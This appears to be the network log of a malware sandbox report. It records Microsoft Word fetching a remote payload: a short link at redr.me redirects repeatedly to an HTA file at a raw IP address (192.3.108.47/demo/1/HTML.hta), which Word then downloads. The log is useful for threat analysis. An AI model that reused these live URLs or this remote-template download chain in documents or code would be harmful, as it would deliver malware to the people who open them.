Network Analysis

OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Word 2013 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: redr.me

HTTP/1.1 200 OK Date: Mon, 02 Oct 2023 05:25:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive allow: GET, HEAD, OPTIONS x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wu8lrOL4F0CJ%2FV3m42xuUb9sWMN0sWZWDbZOehhfgNVryriIhf902Z2tkA1T42WWeI%2F7w0o0hc3gtdjA4Lc4Npy0cDXllSfB1ZX%2Brg85uwHw5W6uQIfov5aP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa85f26f218361-KIX alt-svc: h3=":443"; ma=86400

HEAD /llj4ev HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Word 2013 X-IDCRL_ACCEPTED: t Host: redr.me

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KSi2P%2BLaPijvnzJdr8egwe%2BVmeKJvLWjztZDDU%2FuyFcSoLilO%2F0foZJqPIIGQ6cELtyxPVRNlycjt1Z5CZHEQHREH4nNHZxrEKq85drT4cY9gttaX%2FR7xW77"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa85f66f508361-KIX alt-svc: h3=":443"; ma=86400

OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Word 2013 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: redr.me

HTTP/1.1 200 OK Date: Mon, 02 Oct 2023 05:25:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive allow: GET, HEAD, OPTIONS x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8I5NeAAccZhOQXjMOQHUQCtTaEGgSEYp8O9CCpjvbj9cls2ktNXpobqMJOxShA8NLuGU0TvB%2FgGVKhoeD4lppRvD5DYonjz1nVa2YaPccuwETbmYp%2FAeymj1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa860af8ea8361-KIX alt-svc: h3=":443"; ma=86400

GET /llj4ev HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15) Accept-Encoding: gzip, deflate Host: redr.me Connection: Keep-Alive

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ObJ6sQvPS3Ba0BhZNQ36dPTzenEHGIZF8JQCex1I3thBHKWmK3fRK%2BVHB0MPgtwE8W92Z%2BtcT6%2BHOo9G%2BfaTJc%2FpvjBDKurzld62Rd4ZwvD%2Fsxi6I7B86U1N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa860dafa88d07-KIX alt-svc: h3=":443"; ma=86400

HEAD /llj4ev HTTP/1.1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: redr.me Content-Length: 0 Connection: Keep-Alive

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:16 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BakhJ103yjZ9kxaFz9EaSvsxNzcJ1iTIcd%2FPwOvBCnyNSlnXK3jWqEzMeBRpYwkpBFzIANukvr96aX0n2TeHuCKqD%2BdvIZsAxV7xp7BMaLm7uTHwtZgBvS8M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa8617ba7a8d07-KIX alt-svc: h3=":443"; ma=86400

OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Word 2013 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: redr.me

HTTP/1.1 200 OK Date: Mon, 02 Oct 2023 05:25:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive allow: GET, HEAD, OPTIONS x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q4mGGSrFWSk90ulJ4aftYXFewtEVs6KDu3Qr%2Bt2yltgEKdmi7sgZ8d%2BL2nsZCxO2Jefb%2BtKWkwU8EZvbpUAbtKocjE3X19%2B0VILgzXkZDJYBNEDHnUmLDUJz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa861a7c608361-KIX alt-svc: h3=":443"; ma=86400

HEAD /llj4ev HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Word 2013 X-IDCRL_ACCEPTED: t Host: redr.me

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:17 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LpaSrL9rVFpq%2BAXunRbeEMUydrmPnbhDmwiPzxFNw6RhywCD8LsDNnQgMPQydub97rRYBXngkunUslHYxsDb0CD3Rc7k4m92Z9bozIO4AU53iixUksCgjqGl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa861c1fb38361-KIX alt-svc: h3=":443"; ma=86400

GET /llj4ev HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15) Accept-Encoding: gzip, deflate Host: redr.me Connection: Keep-Alive

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTWJnkg%2FHQZ08WI%2Fh24MZlAYGVFnepzAtnJWyPNP8%2Bwsa7pBXonmOLKZZm5YT1g%2BhrJz5%2B1edt1C4mz5ixLoNwQPR%2BXNI09sAil1YrSV1D9%2Fft07oDG01rsE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa861dce318d07-KIX alt-svc: h3=":443"; ma=86400

HEAD /llj4ev HTTP/1.1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: redr.me Content-Length: 0 Connection: Keep-Alive

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:17 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ipXrPWuOtmvmpYzkc5yBgPJgqaV%2BNXC9jAU8qEuNiLmJIXkQfYsnwqpaRlCwjISFqVVLbBHs8yordJ8DSGN9Qlqe9P%2BtMNnWVmMbfYsFy30StTKq7LlsxOq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa86209bbb8d07-KIX alt-svc: h3=":443"; ma=86400

GET /llj4ev HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: redr.me Connection: Keep-Alive

HTTP/1.1 302 Found Date: Mon, 02 Oct 2023 05:25:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive location: http://192.3.108.47/demo/1/HTML.hta x-frame-options: DENY vary: Origin x-content-type-options: nosniff referrer-policy: same-origin strict-transport-security: max-age=15724800; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JQDyeDc8IceYU8KawQjb9IHHl1G2D4r0RkFAjwaTRPcuH7awTCh%2B0%2F11SM7RIOcCnBdZv4%2BlrAZjo2K1qktzwY2omlvtRo1AheyN7JR7HvTIuIQFRFtwUN0m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80fa862369d58d07-KIX alt-svc: h3=":443"; ma=86400

GET /demo/1/HTML.hta HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: 192.3.108.47

HTTP/1.1 200 OK Date: Mon, 02 Oct 2023 05:25:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT ETag: "29240-6062fcba50cd3" Accept-Ranges: bytes Content-Length: 168512 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta

HEAD /demo/1/HTML.hta HTTP/1.1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Content-Length: 0 Connection: Keep-Alive Host: 192.3.108.47

HTTP/1.1 200 OK Date: Mon, 02 Oct 2023 05:25:16 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT ETag: "29240-6062fcba50cd3" Accept-Ranges: bytes Content-Length: 168512 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/hta

GET /demo/1/HTML.hta HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15) Accept-Encoding: gzip, deflate If-Modified-Since: Mon, 25 Sep 2023 14:30:10 GMT Connection: Keep-Alive Host: 192.3.108.47 If-None-Match: "29240-6062fcba50cd3"

HTTP/1.1 304 Not Modified Date: Mon, 02 Oct 2023 05:25:17 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT ETag: "29240-6062fcba50cd3" Accept-Ranges: bytes Keep-Alive: timeout=5, max=98 Connection: Keep-Alive

HEAD /demo/1/HTML.hta HTTP/1.1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Content-Length: 0 Connection: Keep-Alive Host: 192.3.108.47

HTTP/1.1 200 OK Date: Mon, 02 Oct 2023 05:25:17 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT ETag: "29240-6062fcba50cd3" Accept-Ranges: bytes Content-Length: 168512 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: application/hta

GET /demo/1/HTML.hta HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) If-Modified-Since: Mon, 25 Sep 2023 14:30:10 GMT Connection: Keep-Alive Host: 192.3.108.47 If-None-Match: "29240-6062fcba50cd3"

HTTP/1.1 304 Not Modified Date: Mon, 02 Oct 2023 05:25:18 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT ETag: "29240-6062fcba50cd3" Accept-Ranges: bytes Keep-Alive: timeout=5, max=96 Connection: Keep-Alive